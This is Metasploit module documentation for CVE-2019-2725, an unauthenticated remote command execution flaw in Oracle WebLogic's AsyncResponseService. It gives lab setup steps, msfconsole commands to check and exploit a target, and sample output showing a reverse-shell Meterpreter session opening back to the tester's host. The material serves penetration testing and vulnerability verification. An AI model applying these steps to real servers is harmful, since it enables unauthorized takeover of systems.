CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md
Views: 1904

Vulnerable Application

CVE-2019-2725 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component. The exploit provides an unauthenticated attacker with remote arbitrary command execution.

Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments. It is downloadable from Oracle once registered for an account. For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (wls1036_linux32.bin), Weblogic 10.3.6 for Windows (wls1036_dev.zip). For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (fmw_12.2.1.2.0_wls.jar) in combination with a JDK (jdk-8u211-windows-x64.exe).

Verification Steps

Install the application

  1. Install the application using the binaries above, with both a WebLogic server and an admin server.

  2. When prompted, name the project base_domain.

  3. When prompted, use a development environment instead of a production environment.

  4. When prompted, keep the default port of TCP/7001.

  5. When prompted, provide a username and password, and make a note of them.

  6. Upon completion of the installer, find and execute the admin server. On Windows: C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd. On Linux: ~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh

  7. You may be prompted for the username and password you generated during the install process.

  8. Wait for the output: <Server state changed to RUNNING.>

Checking for the vulnerability

  1. Start msfconsole

  2. use exploit/multi/misc/weblogic_deserialize_asyncresponseservice

  3. Configure RHOSTS to the target address, and set RPORT if the default port is not being used.

  4. Run the check method to confirm exploitability.

  5. Look for the following output:

msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
[+] 172.16.135.128:8088 - The target is vulnerable.

Exploiting the vulnerability

  1. Follow the steps in the previous "checking" section.

  2. Set the operating system of the target (eg. set TARGET Windows)

  3. Configure the payload and payload parameters.

  4. run

Options

TARGETURI

Set this to the AsyncResponseService uri, normally it should be /_async/asyncresponseservice.

Scenarios

msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > exploit

[*] Started reverse TCP handler on 172.16.135.1:4444 
[*] Generating payload...
[*] Sending payload...
[*] Sending stage (179779 bytes) to 172.16.135.128
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49266) at 2019-05-22 14:16:03 -0500

meterpreter >